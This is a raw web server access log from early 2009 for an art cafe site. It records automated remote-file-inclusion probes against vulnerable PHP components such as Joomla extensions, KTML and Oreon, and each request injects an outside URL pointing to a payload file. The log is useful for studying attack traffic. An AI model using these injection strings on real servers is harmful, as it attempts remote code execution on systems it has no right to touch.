211.115.212.166 - - [04/Jan/2009:21:33:33 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
211.115.212.166 - - [04/Jan/2009:21:33:33 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
218.234.21.131 - - [04/Jan/2009:21:34:01 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
218.234.21.131 - - [04/Jan/2009:21:34:02 -0800] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
218.234.21.131 - - [04/Jan/2009:21:34:02 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
203.162.139.20 - - [04/Jan/2009:21:35:40 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.giovaniemissione.it/media/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.imagineartcafe.com"
203.162.139.20 - - [04/Jan/2009:21:35:40 -0800] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.giovaniemissione.it/media/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.imagineartcafe.com"
203.162.139.20 - - [04/Jan/2009:21:35:40 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.giovaniemissione.it/media/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.imagineartcafe.com"
85.236.53.4 - - [04/Jan/2009:21:35:59 -0800] "GET /appserv/main.php?appserv_root=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
85.236.53.4 - - [04/Jan/2009:21:35:59 -0800] "GET /logs//appserv/main.php?appserv_root=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
203.162.139.20 - - [04/Jan/2009:21:37:01 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.giovaniemissione.it/media/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.imagineartcafe.com"
203.162.139.20 - - [04/Jan/2009:21:37:01 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.giovaniemissione.it/media/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.imagineartcafe.com"
203.162.139.20 - - [04/Jan/2009:21:37:01 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.giovaniemissione.it/media/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.imagineartcafe.com"
212.99.231.50 - - [04/Jan/2009:21:37:15 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.imagineartcafe.com"
212.99.231.50 - - [04/Jan/2009:21:37:15 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.imagineartcafe.com"
212.99.231.50 - - [04/Jan/2009:21:37:16 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.imagineartcafe.com"
212.99.231.50 - - [04/Jan/2009:21:37:41 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.imagineartcafe.com"
212.99.231.50 - - [04/Jan/2009:21:37:41 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.imagineartcafe.com"
212.99.231.50 - - [04/Jan/2009:21:37:41 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.imagineartcafe.com"
222.236.44.69 - - [04/Jan/2009:21:37:46 -0800] "GET /errors.php?error=http://i0.co.kr/i0mall//admin/idz.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.imagineartcafe.com"
77.221.130.2 - - [04/Jan/2009:21:42:18 -0800] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
77.221.130.2 - - [04/Jan/2009:21:42:19 -0800] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http